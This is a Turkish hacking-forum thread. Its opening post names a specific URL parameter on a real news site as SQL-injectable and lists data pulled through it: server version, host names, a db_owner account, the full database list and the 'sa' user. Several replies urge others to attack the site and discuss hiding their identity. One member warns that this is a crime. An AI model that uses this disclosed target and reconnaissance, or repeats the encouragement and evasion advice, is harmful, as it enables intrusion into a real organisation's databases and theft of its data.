Samanyolu Haber Mssql İnjection
-
Url : http://finans.samanyoluhaber.com/ShowEconomyNews.aspx?strTarih=2010020512013
Version = Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Db Name= Foreks
Server Name STVSQLSERVER
Host Name SRV-SHABERSQL
System User shaber
Current User shaber
Privilege db_owner
Databases AracTakipVA, METUS_LIB_SYG_DIGITAL_ARSIVI, Haber, METUS_ARC_SAMANYOLU_TANITIM, METUS_LIB_STV_DIGITAL_ARSIV, aspnetdb, METUS_ARC_SHABER_TANITIM, LIBRARY_HABER_ANKARA_2, LIBRARY_HABER_2, METUS_ARC_KURETV_ARSIV, SARE, METUS_ARC_BYT_METUS, YTK, METUS_LIB_byt_geicic2, ARCHIVE_ytv_metus_arsiv, METUS_ARC_SERFILM_ARSIV, SYG_Ceza, SECIM09, SYG_Portal, STR, reklamy, METUS_LIB_STV_BYT_GECICI, SDK, SYG_Pool, SYG_Meyer, Foreks, SERVICE, LIBRARY_SPOR, EvrakTakip, castson, METUS_ARC_BELGESEL_ARSIV, Salary, StvPortal, distribution, LIBRARY_GECICI, SRR, METUS_LIB_CASTING, Adwork, msdb, model, tempdb, master,
Users sa, shaber,
:) Gümletin Gitsin Müritler :) Saygılarla Agaaa :D By DersimliHeykir
-
sakın haaa
öyle bir hata yapmayın
başınıza iş mi almaya çalışıyorsunuz ?
bunların suç teşkil ettiğini daha kaç kere söyleyeceğiz ?
-
ben yapmazsam ölürüm.
Günahtır yapmayın ergenekon falan
-
destanition bunu yazdı:
-----------------------------
sakın haaa
öyle bir hata yapmayın
başınıza iş mi almaya çalışıyorsunuz ?
bunların suç teşkil ettiğini daha kaç kere söyleyeceğiz ?
-----------------------------Kendini gizlemesini bilen için sorun yoktur heralde...cesareti olan varsa gümletsin şurayı :)
İşinde Profesyonel olanlar :D
-
ben oraya bile girmek istemiyorum :D
gerek yok :D
-
kendini gizlemek mi ?
sen öyle zannet. teknolojinin ne kadar geliştiğini bilmiyorsun herhalde
sen istediğini yap emniyet seni bulur kafanı yorma
istediğin kadar IP DNS değiştir fark etmez. mesela tsk hakkında mail atan adam da kendini gizlemişti ne oldu ? bulundu
-
Bravo güzel
-
destanition bunu yazdı:
kendini gizlemek mi ?
istediğin kadar IP DNS değiştir fark etmez. mesela tsk hakkında mail atan adam da kendini gizlemişti ne oldu ? bulundu
-----------------------------yoksa sen onun kendini gizlediğine inandınmı :)
hocam teknoloji tek taraflı gelişmiyo dikkatini çekerim..
Kendini gizlemesini bilen gizler :)
basbakanlıgın sitesini hackleyenleri bulabildilermi ?
hadi buldularda bnm haberim yok diyelim microsofta basan hepimizin ytanıdıgı kişiyi bulabildiler mi :D
-
ReDsEa bunu yazdı:
destanition bunu yazdı:
-----------------------------yoksa sen onun kendini gizlediğine inandınmı :)
hocam teknoloji tek taraflı gelişmiyo dikkatini çekerim..
Kendini gizlemesini bilen gizler :)
basbakanlıgın sitesini hackleyenleri bulabildilermi ?
hadi buldularda bnm haberim yok diyelim microsofta basan hepimizin ytanıdıgı kişiyi bulabildiler mi :D
-----------------------------ii sen de git milletin sitelerini hackle bilmem ne yap sonra başkaları senin siteni hacklese küfür eder dümdüz gidersin yanlış mı ?
sen neden başkasına zarar vermeyi destekliyorsun ? çok etik bir davranış mı sence haber sitelerine saldırmak vs..
artık böyle şeyleri bırakın
-
Bencede kendini gizlemesini bilen gizler. En azından bu işler için kendi bilgisayarını kullanmaması gerektiğini bilmesi gerekir :)
-
destanition bunu yazdı:
kendini gizlemek mi ?
-----------------------------aynı samanyolu haber spikerleri gibi yorum yapıyorsun.